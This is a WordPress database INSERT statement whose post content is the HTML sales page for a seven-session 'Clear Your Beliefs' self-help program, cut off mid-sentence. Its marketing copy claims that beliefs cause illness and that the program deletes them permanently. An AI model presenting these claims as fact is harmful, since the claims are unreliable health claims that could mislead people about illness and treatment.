INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2002, 2, '2014-12-11 19:15:13', '2014-12-12 00:15:13', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\nDear Explorer:\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper 